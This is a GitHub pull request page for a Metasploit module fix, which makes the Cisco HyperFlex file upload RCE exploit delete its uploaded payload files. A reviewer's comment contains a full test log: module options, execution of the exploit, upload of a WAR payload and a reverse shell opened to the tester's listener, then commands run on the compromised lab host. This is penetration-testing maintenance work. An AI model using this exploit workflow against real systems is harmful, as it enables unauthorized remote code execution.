Fix for file clean up in the Cisco Hyperflex file upload RCE module #15503

Merged
merged 1 commit into from
Aug 2, 2021


jheysel-r7
Contributor

@jheysel-r7 jheysel-r7 commented Jul 30, 2021

@gwillcox-r7 gwillcox-r7 self-assigned this Aug 2, 2021
@gwillcox-r7
Contributor

After much headbanging due to VMware networking issues and me just generally being silly, managed to confirm this works as expected:

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > show options

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:h
                                                ost:port][...]
   RHOSTS            192.168.224.208  yes       The target host(s), range CIDR identifier, or
                                                hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  ccDDyhhmGo       no        Choose a filename for the payload. (Default is
                                                 random)
   VHOST                              no        HTTP server virtual host


Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.224.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.224.208
[+] Deleted /var/lib/tomcat7/webapps/crossdomain.xml.war
[+] Deleted /var/lib/tomcat7/webapps/crossdomain.xml/
[*] Command shell session 3 opened (192.168.224.128:4444 -> 192.168.224.208:50326) at 2021-08-02 15:24:32 -0500

id
uid=111(tomcat7) gid=114(tomcat7) groups=114(tomcat7),42(shadow)
whoami
tomcat7
uname -a
Linux HyperFlex-Installer-4.0.2d 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

@wvu
Contributor

wvu commented Aug 2, 2021

Thank you for testing this!!

@gwillcox-r7 gwillcox-r7 merged commit 1b182ee into rapid7:master Aug 2, 2021
@gwillcox-r7 gwillcox-r7 added the rn-fix release notes fix label Aug 2, 2021
@gwillcox-r7
Contributor

Release Notes

A bug has been fixed in the Cisco Hyperflex file upload RCE module that prevented it from properly deleting the uploaded payload files. Uploaded payload files should now be properly deleted.

Labels
bug module rn-fix release notes fix